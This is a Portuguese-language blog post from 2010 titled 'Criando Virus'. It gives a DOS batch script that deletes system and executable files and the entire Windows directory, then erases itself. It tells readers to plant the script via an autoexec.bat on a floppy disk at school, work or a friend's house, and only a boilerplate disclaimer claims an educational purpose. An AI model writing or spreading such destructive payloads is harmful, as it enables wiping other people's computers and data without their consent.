quinta-feira, 8 de julho de 2010

Criando Virus



ESSE TEXTO TEM CARÁTER DIDÁTICO / APRENDIZADO E SEGURANÇA. O USO QUE SE FARÁ DA INFORMAÇÃO É DE SUA TOTAL RESPONSABILIDADE. ELE DEVE SER USADO PARA FINS LEGAIS APENAS.


Pra que você quer saber como criar um vírus? Bem... A responsabilidade é sua, blz? Nesta dica você terá uma aulinha prática de como criar um vírus que detona TUDO do HD.
NÃO FAÇA COMENTÁRIOS COM MÁS INTENÇÕES. NÃO AJUDAREMOS VOCÊ A PREJUDICAR NINGUÉM. O CONTEÚDO DESTE ARTIGO VISA MOSTRAR NOÇÕES IMPORTANTES PARA TODOS OS LADOS. O USO QUE SE FARÁ DELE É DE TOTAL RESPONSABILIDADE DOS USUÁRIOS. COMENTÁRIOS INDESEJADOS SERÃO IGNORADOS, E CASO SEJAM OFENSIVOS OU VÁ CONTRA OS PRINCÍPIOS DO SITE, SERÃO REMOVIDOS SEM AVISO PRÉVIO.




Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:

copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga tchau.

Nenhum comentário:

Postar um comentário